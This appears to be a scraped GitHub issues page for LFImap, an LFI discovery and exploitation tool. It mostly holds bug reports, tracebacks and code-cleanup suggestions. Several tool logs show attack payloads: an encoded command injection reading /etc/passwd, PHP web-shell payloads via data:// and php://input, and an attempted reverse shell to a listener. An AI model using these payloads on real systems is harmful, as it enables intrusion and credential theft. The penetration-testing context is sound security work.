hansmach1ne / lfimap Goto Github PK
View Code? Open in Web Editor NEWLocal File Inclusion discovery and exploitation tool
License: Apache License 2.0
Local File Inclusion discovery and exploitation tool
License: Apache License 2.0
└─# python3.9 lfimap.py --all -F /WhiteyCookie/Github/ParamSpider/paramspider/results/redacted.com.txt -v
[i] Session information is not provided. LFImap might have troubles finding vulnerabilities if testing endpoint requires authentication.
[i] Parsing URL [1/279]: 'https://www.redacted.com/path/to/news?cHash=PWN'
[i] Preparing to test GET 'cHash' parameter...
[i] Preparing to test misc issues using heuristics...
[.] Testing for XSS...
[.] Testing for CRLF...
[.] Testing for error-based info leak...
[.] Testing for open redirect...
[i] Testing with filter wrapper...
[i] Testing with input wrapper...
Traceback (most recent call last):
File "/WhiteyCookie/Github/LFImap/lfimap.py", line 375, in
main()
File "/WhiteyCookie/Github/LFImap/lfimap.py", line 111, in main
test_input(url, "")
File "/WhiteyCookie/Github/LFImap/src/attacks/input.py", line 16, in test_input
if(args.is_tested_param_post):
AttributeError: 'Namespace' object has no attribute 'is_tested_param_post'
The issue is that /etc/passwd might be blocked by waf, so try to include modality that will use 'silent' payloads and include different files to confirm the vulnerability.
Also Java tends to not allow path traversal outside the web root, so implement something like /WEB-INF/web.xml or alike method of discovery...
Implement automatic token refresh for requests.
There is lack of timeouts in the requests
calls I have added them in a PR:
#67
└─# python3.9 lfimap.py --t -F /WhiteyCookie/Github/ParamSpider/paramspider/results/redacted.com.txt --use-long -v
[i] Session information is not provided. LFImap might have troubles finding vulnerabilities if testing endpoint requires authentication.
[i] Parsing URL [1/279]: 'https://www.redacted.com/path/to/news?cHash=PWN'
[i] Preparing to test GET 'cHash' parameter...
[i] Testing path truncation using '/WhiteyCookie/Github/LFImap/src/wordlists/long.txt' wordlist...
Traceback (most recent call last):
File "/WhiteyCookie/Github/LFImap/lfimap.py", line 375, in
main()
File "/WhiteyCookie/Github/LFImap/lfimap.py", line 164, in main
print(colors.red("[-]") + " GET parameter '" + get_params_with_param(url, args.param) + "' doesn't seem to be vulnerable.\n")
TypeError: get_params_with_param() takes 1 positional argument but 2 were given
Create easy pip install module.
whoami :)
└─$ python3
Python 3.11.6 (main, Oct 8 2023, 05:06:43) [GCC 13.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from lfimap import main
>>> main()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 264, in main
if args['param'] in config.url:
^^^^^^^^^^
AttributeError: module 'src.configs.config' has no attribute 'url'. Did you mean: 'urls'?
Issue background:
When running python3 lfimap.py -h
, interpreter looks for if(__name__ == "__main__")
and enter this block, however once the program is imported as a module and main() is called (like pip configuration does/requires), it will error out, because checkArgs is not called at all in that case:
# Check command-line arguments
if not checkArgs():
sys.exit(-1)
lfimap.py: error: unrecognized arguments: --url http://testphp.vulnweb.com/showimage.php?file=PWN
There seems to be a circular dependency in the code that makes it impossible to load a module directly without the "main.py" code
This makes writing tests (pytest) impossible and probably affects also the stability of the code (debugging fails to properly jump to the right place due to this), the circular dependency can bee seen in:
from src.attacks.pwn import pwn
src/attacks/pwn.py:2: in <module>
from src.attacks.bash import exploit_bash
src/attacks/bash.py:1: in <module>
from src.httpreqs import request
src/httpreqs/request.py:5: in <module>
from src.attacks.pwn import pwn
E ImportError: cannot import name 'pwn' from partially initialized module 'src.attacks.pwn' (most likely due to a circular import) (src/LFImap/src/attacks/pwn.py)
Its not limited to the pwn module importing, rather to anything that imports pwn
in some code flow
I think it is a good idea to preform code cleanup so that this doesn't happen
The code currently is written with somewhat weird tabbing/ missing of string concating, ' instead of ", may I recommend using black
to just look more readable?
Here is a PR that will show you the difference (I just ran 'black' on the root folder)
#53
The rfi.py refers to these URLs:
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.php"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.jsp"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.html"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.gif"
)
pylds.append(
"https%3A%2F%2Fgithub.com%2Fhansmach1ne%2FLFImap%2Fblob%2Fmain%2Fsrc%2Fexploits%2Fexploit.png"
)
Which decode results in:
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.php"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.jsp"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.html"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.gif"
)
pylds.append(
"https://github.com/hansmach1ne/LFImap/blob/main/src/exploits/exploit.png"
)
None of these URLs exist :(
Is this intentional? looks like a mishap
Hello, thank you for your project, it seems very promising.
I get the following error while trying to run it.
C:\tools\LFImap>python lfimap.py -U "http://testphp.vulnweb.com/showimage.php?file=php://filter/convert.base64-encode/resource=showimage.php" -C "asdasd" -a
Traceback (most recent call last):
File "C:\tools\LFImap\lfimap.py", line 1799, in <module>
main()
File "C:\tools\LFImap\lfimap.py", line 1442, in main
r,_ = REQUEST(url, headers, postTest, proxies, "test", "test")
File "C:\tools\LFImap\lfimap.py", line 255, in REQUEST
if(tOut is not None): res = requests.request(args.method, url, data=postData.encode("utf-8"), headers=headersData, proxies=proxy, verify=False, timeout=tOut)
File "C:\Python310\lib\site-packages\requests\api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
File "C:\Python310\lib\site-packages\requests\sessions.py", line 562, in request
method=method.upper(),
AttributeError: 'NoneType' object has no attribute 'upper'
I am using Python 3.10.6.
Any idea?
└─$ python3 lfimap.py -U "http://10.10.200.85/vulnerabilities/exec/#" -D "ip=a&Submit=submit" -C "PHPSESSID=4827vaidcjprtcen3l7aoes9p0; security=low" -a -v --lhost 10.8.164.25 --lport 99 -x
[i] Testing form-line 'ip' parameter...
[i] Testing misc issues using heuristics...
[i] Testing for XSS...
[i] Testing for CRLF...
[i] Testing for error-based info leak...
[i] Testing for open redirect...
[i] Testing with filter wrapper...
[i] Testing with input wrapper...
[i] Testing with data wrapper...
[i] Testing with expect wrapper...
[i] Testing with file wrapper...
[i] Testing remote file inclusion...
[i] Opening temporary local web server on port 8000 and hosting $LFIMAP_DIR/src/exploits that will be used for test inclusion
[i] Trying to include internet-hosted file...
[i] Testing path truncation using '/home/kali/Desktop/leet_toolz/LFImap/src/wordlists/short.txt' wordlist...
[i] Testing results-based OS command injection...
[+] RCE -> 'http://10.10.200.85/vulnerabilities/exec/#' -> HTTP POST -> 'ip=1%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%27%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D%5C%22%3Bcat%24%7BIFS%7D%2Fetc%2Fpasswd%3B%23%24%7BIFS%7D&Submit=submit'
[?] Checking if bash is available on the target system...
[*] Starting reverse listener on 0.0.0.0:99
[.] Trying to pop reverse shell to 10.8.164.25:99 using bash via command injection...
[-] Previous request caused uncaught exception. Try proxying requests to see exactly what happened
Traceback (most recent call last):
File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 477, in <module>
main()
File "/home/kali/Desktop/leet_toolz/LFImap/lfimap.py", line 404, in main
test_cmd_injection(url, post)
File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/cmdi.py", line 54, in test_cmd_injection
r, br = REQUEST(u, reqHeaders, postTest, proxies, "RCE", "CMD")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/request.py", line 221, in REQUEST
if(init(res, "", exploitType, url, postData, headersData, exploitMethod)):
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/home/kali/Desktop/leet_toolz/LFImap/src/httpreqs/request.py", line 106, in init
pwn(exploit)
File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/pwn.py", line 72, in pwn
exploit_bash(exploit, "CMD", ip, port)
File "/home/kali/Desktop/leet_toolz/LFImap/src/attacks/bash.py", line 79, in exploit_bash
request.REQUEST(url, args.httpheaders, post.replace(config.tempArg, encode(bashPayloadStageOne)), post, config.proxies, "", "", exploit = True)
TypeError: REQUEST() got multiple values for argument 'exploit'
Ability to detect second order LFI/LFR, stored xss
Hi, I am trying to save the output of the script, for example like this:
python3 LFImap/lfimap.py -U "http://localhost/vulnerabilities/fi/?page=include.php" -C "..." -a > fi.txt
Or by using subprocess.Popen and then using iter to get the output, but id does not print anything.
Also tryed with subprocess.run and capture_output, and printing it at the end... Still nothing.
Am I doing something wrong?
└─$ python3 lfimap.py -U "https://mach1ne.org/a/PWN"
[-] Something unexpected has happened, initial testing response is not clearly received. Please check your switches and url endpoint(s). Exiting...
Problematic if user wants to test for example specific part of the request that contains binary data
Can we use this default .gitignore
file?
https://github.com/github/gitignore/blob/main/Python.gitignore
It will help git ignore venv/
and __pycache__
and similar
At the moment the constant calling to:
from src.utils.arguments import args
Is causing the code to have complexity that makes it impossible to:
args
is accessed as it doesn't know which arguments exist/don't existargs = parser.parse_args()
code is called and parameters are init
I suggest to move the arguments.py
code so that is not all sitting in the 'global' rather inside a class, init
once when the code starts, stores the variables inside a dict
rather than args
or inside self
values of this class, pass this newly created class around to whoever needs it or still use it as a global (but prevent its init from being called on every import)
└─$ python3 lfimap.py -U "http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=aa#" -C "security=low; PHPSESSID=fd6582cc1b2843b479965f570419b6de" --lhost 192.168.56.113 --lport 99 -r -P "127.0.0.1:8080" -d -heur
[i] Testing GET 'name' parameter...
[+] XSS -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=mns%3A817%3Ew%3Cgf%3B93%22%27rq' -> full reflection in response
Content-Type: text/html;charset=utf-8
[+] RCE -> 'http://192.168.56.104/dvwa/vulnerabilities/xss_r/?name=data%3A%2F%2Ftext%2Fplain%3Bbase64%2CPD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOz8%2B&c=cat%20%2Fetc%2Fpasswd'
----------------------------------------
LFImap finished with execution.
Parameters tested: 1
Requests sent: 16
Vulnerabilities found: 2
Add support for endpoints that use JSON as the Content-Type.
This is partially supported now, by using placeholder PWN as the injection point, however parameters won't be parsed and tested 1 by 1 automatically.
Tried to initiate a reverse shell and this is the output i get:
python3 lfimap.py -U "http://localhost/vulnerabilities/fi/?page=include.php" -C "PHPSESSID=pee4sgbjm74s57o43h39vevqo0; security=low" -a --lhost 192.168.65.3 --lport 3001 -x -v
[i] Testing GET 'page' parameter...
[i] Testing misc issues using heuristics...
[i] Testing for XSS...
[i] Testing for CRLF...
[i] Testing for error-based info leak...
[i] Testing for open redirect...
[i] Testing with filter wrapper...
[+] LFI -> 'http://localhost/vulnerabilities/fi/?page=php%3A%2F%2Ffilter%2Fresource%3D%2Fetc%2Fpasswd'
[i] Testing with input wrapper...
[+] RCE -> 'http://localhost/vulnerabilities/fi/?page=php%3a%2f%2finput&cmd=cat%20%2Fetc%2Fpasswd' -> HTTP POST -> '<?php echo(shell_exec($_GET['cmd']));?>'
[-] Previous request caused uncaught exception. Try proxying requests to see exactly what happened
Traceback (most recent call last):
File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/lfimap.py", line 769, in <module>
main()
File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/lfimap.py", line 642, in main
test_input(url, post)
File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/attacks/input.py", line 57, in test_input
_, br = REQUEST(u, reqHeaders, post, proxies, "RCE", "INPUT")
File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/httpreqs/request.py", line 359, in REQUEST
if init(res, "", exploitType, url, postData, headersData, exploitMethod):
File "/home/rares/Licenta/license/attack_scan_system/tool_repos/LFImap/src/httpreqs/request.py", line 148, in init
pwn(exploit)
NameError: name 'pwn' is not defined
pwn() is not called when '-t' module finds the vulnerability
Implement ability to RCE with reverse shell for all attack techniques in case of a true positive
Not clear how to use long.txt wordlist instead of short.txt, can you add it to instructions?
Also need some bypass techniques for waf like urlencode
Suggestion from @nrathaus.
The args.method
is undefined if -M
is not specified and the placeholder (--placeholder
, args.param
) is not part of the URL. This causes the application to crash.
The issue lies in the following lines:
Lines 1623 to 1632 in 436ea01
One possible solution would be setting default method in the optionsGroup.add_argument
call or rewriting the code in this fashion:
if (args.url and args.param in args.url): args.method = "GET"
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.